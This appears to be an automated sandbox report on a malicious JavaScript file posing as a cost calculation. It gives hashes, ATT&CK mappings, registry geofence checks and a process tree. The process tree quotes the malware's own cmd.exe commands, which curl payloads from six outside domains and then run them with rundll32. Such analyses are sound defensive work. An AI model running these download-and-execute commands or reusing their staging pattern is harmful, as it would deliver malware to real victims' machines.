ca9a409f690d3c5c22bfe0732f7113c6beb234d455afa8cb89c5e909c342d05a

Analysis

max time kernel
143s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230221-de
resource tags

arch:x64arch:x86image:win10v2004-20230221-delocale:de-deos:windows10-2004-x64systemwindows
submitted
07-06-2023 18:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Calculation-of-costs-874028386.js
Size

149KB
MD5

fb5b4219a7a47effe058b4a5e7e48a6c
SHA1

421dd44ba85cb8278b7326b2c35d1078a375f79b
SHA256

5b2290e985718dcb2b9ed3a4ea6f4982c9db96a9ac7d20e7ee8d11f4d1e0a94a
SHA512

890e04f3efab155556b1dbe996d79687e64904881741e52707188c5bf513997fae904765b047c0e54e5c7774d12fab8cf9a0e73434f928ac9333ae585483974d
SSDEEP

3072:gRzeIwVOOpMRgFAzMeTluFzdYfoJ+v9oh:B6Op/FanTluFzdYf7Sh

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1664	timeout.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 116	2972	wscript.exe	89
PID 2972 wrote to memory of 116	2972	wscript.exe	89
PID 2972 wrote to memory of 320	2972	wscript.exe	91
PID 2972 wrote to memory of 320	2972	wscript.exe	91
PID 2972 wrote to memory of 856	2972	wscript.exe	93
PID 2972 wrote to memory of 856	2972	wscript.exe	93
PID 2972 wrote to memory of 4692	2972	wscript.exe	95
PID 2972 wrote to memory of 4692	2972	wscript.exe	95
PID 2972 wrote to memory of 1696	2972	wscript.exe	96
PID 2972 wrote to memory of 1696	2972	wscript.exe	96
PID 2972 wrote to memory of 1852	2972	wscript.exe	99
PID 2972 wrote to memory of 1852	2972	wscript.exe	99
PID 2972 wrote to memory of 880	2972	wscript.exe	100
PID 2972 wrote to memory of 880	2972	wscript.exe	100
PID 320 wrote to memory of 4652	320	cmd.exe	103
PID 320 wrote to memory of 4652	320	cmd.exe	103
PID 1696 wrote to memory of 4792	1696	cmd.exe	107
PID 1696 wrote to memory of 4792	1696	cmd.exe	107
PID 1852 wrote to memory of 512	1852	cmd.exe	104
PID 1852 wrote to memory of 512	1852	cmd.exe	104
PID 856 wrote to memory of 520	856	cmd.exe	105
PID 856 wrote to memory of 520	856	cmd.exe	105
PID 116 wrote to memory of 4968	116	cmd.exe	106
PID 116 wrote to memory of 4968	116	cmd.exe	106
PID 4692 wrote to memory of 3840	4692	cmd.exe	108
PID 4692 wrote to memory of 3840	4692	cmd.exe	108
PID 880 wrote to memory of 1664	880	cmd.exe	109
PID 880 wrote to memory of 1664	880	cmd.exe	109
PID 880 wrote to memory of 3028	880	cmd.exe	112
PID 880 wrote to memory of 3028	880	cmd.exe	112

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Calculation-of-costs-874028386.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://skagnechri.com/0.7977186046203185.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\system32\curl.exe
    curl https://skagnechri.com/0.7977186046203185.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:4968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://maicobbbi.com/0.5611314264869827.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\system32\curl.exe
    curl https://maicobbbi.com/0.5611314264869827.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:4652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://yerkaija.com/0.3472925026612384.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\system32\curl.exe
    curl https://yerkaija.com/0.3472925026612384.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://glovitol.com/0.4665596960711721.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4692
- - C:\Windows\system32\curl.exe
    curl https://glovitol.com/0.4665596960711721.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:3840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://vitcaka.com/0.11851630332841018.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\system32\curl.exe
    curl https://vitcaka.com/0.11851630332841018.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:4792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c mkdir C:\Poliset\Nolser & curl https://lauconisc.com/0.6150340775228645.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Windows\system32\curl.exe
    curl https://lauconisc.com/0.6150340775228645.dat --output C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX
    3⤵
    PID:512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:880
- - C:\Windows\system32\timeout.exe
    timeout 10
    3⤵
    - Delays execution with timeout.exe
    PID:1664
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX,menu
    3⤵
    PID:3028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Poliset\Nolser\file.OOOOOCCCCCXXXXX

Filesize
196B

MD5
62962daa1b19bbcc2db10b7bfd531ea6

SHA1
d64bae91091eda6a7532ebec06aa70893b79e1f8

SHA256
80c3fe2ae1062abf56456f52518bd670f9ec3917b7f85e152b347ac6b6faf880

SHA512
9002a0475fdb38541e78048709006926655c726e93e823b84e2dbf5b53fd539a5342e7266447d23db0e5528e27a19961b115b180c94f2272ff124c7e5c8304e7

Download Submit